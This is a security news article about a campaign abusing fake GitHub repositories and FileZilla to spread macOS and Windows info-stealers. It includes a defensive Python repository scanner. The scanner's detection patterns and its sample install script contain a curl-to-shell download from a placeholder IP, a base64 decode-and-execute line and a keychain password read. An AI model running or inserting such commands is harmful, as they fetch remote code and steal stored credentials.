
Hackers Exploited GitHub and FileZilla to Deliver Banking Malware

The Insikt Group at Recorded Future has found a sophisticated cybercrime operation run by Russian-speaking threat actors from the Commonwealth of Independent States (CIS).

This group has abused trusted, legitimate platforms such as GitHub and FileZilla to distribute banking malware, posing a serious risk to both personal and enterprise security.

GitCaught: Exposing the Misuse of GitHub in Cyberattacks

The actors behind this campaign are highly skilled, with a deep understanding of how software is distributed and how to maintain users' trust in it.

They created fake GitHub accounts and repositories that resembled real software programs, such as Pixelmator Pro, 1Password, and Bartender 5.

These fake versions were filled with malware, such as the Atomic MacOS Stealer (AMOS) and Vidar, meant to access users’ computers and steal private information.

The Insikt Group at Recorded Future found that these malware deployments were not isolated incidents.

Instead, they shared the same command-and-control (C2) infrastructure, indicating a coordinated effort designed to make the attacks more effective.

This shared C2 setup suggests the threat actors belong to a well-organized, well-resourced group capable of sustaining long-running cyberattacks across a range of devices and operating systems.

The constantly evolving nature of these malware families makes them very hard for conventional security controls to catch.

Because software is always getting smarter and more complicated, cybersecurity needs to be proactive and flexible.

Organizations are advised to follow strict security practices, especially when bringing in code from outside their own environment.

Setting up a company-wide code review process and using automated scanning tools like GitGuardian, Checkmarx, or GitHub Advanced Security can help find malicious code or anomalous patterns before it is adopted.
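The review-plus-scanning step described above can be approximated with a lightweight pre-import check that walks a repository checkout and flags installer patterns a reviewer would want to see before code is adopted. The script below is an added example written for this article, not a tool from Recorded Future or any of the named vendors; the rule list, the `Finding` structure and the sample checkout are constructed here for illustration and are deliberately narrow, so it complements rather than replaces a commercial scanner.

```python
import re
from dataclasses import dataclass

# Each rule: a name, a compiled regex, and the reason a reviewer cares.
# These are illustrative red flags for third-party install scripts, chosen
# for this example; a production scanner would carry a far larger rule set.
RULES = [
    ("pipe_to_shell",
     re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
     "remote script piped straight into a shell at install time"),
    ("raw_ip_download",
     re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?/"),
     "download from a bare IP address rather than a named host"),
    ("decode_and_exec",
     re.compile(r"base64\s+(-d|--decode)[^\n]*\|\s*(ba|z)?sh\b"
                r"|eval\s*\(\s*base64_decode|exec\s*\(\s*base64\.b64decode"),
     "encoded payload decoded and executed at runtime"),
    ("keychain_access",
     re.compile(r"\bsecurity\s+(find-generic-password|dump-keychain)\b"),
     "reads macOS keychain secrets, which an installer has no need to do"),
    ("long_b64_blob",
     re.compile(r"[A-Za-z0-9+/]{200,}={0,2}"),
     "large opaque base64 blob embedded in source"),
]


@dataclass(frozen=True)
class Finding:
    path: str
    line: int
    rule: str
    reason: str
    snippet: str


def scan_text(path, text):
    """Run every rule over every line of one file and collect the hits."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern, reason in RULES:
            if pattern.search(line):
                findings.append(Finding(path, lineno, name, reason, line.strip()[:80]))
    return findings


def scan_repo(files):
    """files: mapping of relative path -> contents (a checkout read into memory)."""
    findings = []
    for path, text in sorted(files.items()):
        findings.extend(scan_text(path, text))
    return findings


def review_verdict(findings):
    """Gate the import: any hit blocks it until a human has reviewed the findings."""
    return "block" if findings else "pass"


# Constructed sample checkout: a benign README plus an install script that
# shows the kind of behaviour a look-alike repository might hide.
SAMPLE_REPO = {
    "README.md": "# Example Pro\n\nBuild with `make` and run `./example`.\n",
    "scripts/install.sh": (
        "#!/bin/sh\n"
        "set -e\n"
        "curl -fsSL http://203.0.113.10:8080/setup.sh | sh\n"
        "echo aGVsbG8= | base64 -d | sh\n"
        "security find-generic-password -ga user\n"
    ),
}

if __name__ == "__main__":
    hits = scan_repo(SAMPLE_REPO)
    for f in hits:
        print(f"{f.path}:{f.line} [{f.rule}] {f.reason}: {f.snippet}")
    print("verdict:", review_verdict(hits))
```

Rules are evaluated per line so each finding carries a precise location for the reviewer; anything that fires blocks the import rather than merely warning, which is the posture the article recommends for code coming from outside the organization.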

FileZilla: Another Vector for Malware Distribution

Alongside GitHub, the threat actors have also abused FileZilla, a widely used FTP client, to distribute their malicious payloads.

By leveraging well-known internet services, cybercriminals have been able to stage data-stealing attacks with alarming ease.

The complexity of the operation and the fact that new malware is always being made show how important it is to take a multi-layered approach to cybersecurity.

In the medium term, businesses should strengthen their overall security posture by devising ways to monitor and block unauthorized third-party programs and scripts that could be used to spread malware.

It’s also important to share information and collaborate with the larger cybersecurity community to fight complex campaigns like the one this study found.

The findings from Recorded Future’s Insikt Group show the importance of staying alert and acting as online threats evolve.

Cybercriminals still use trusted platforms to spread malware, so businesses must stay alert and use full security plans to keep their systems and data safe.

To get a full report as a PDF file with more information and a more in-depth study, click here.

Divya is a Senior Journalist at Cyber Security news covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.
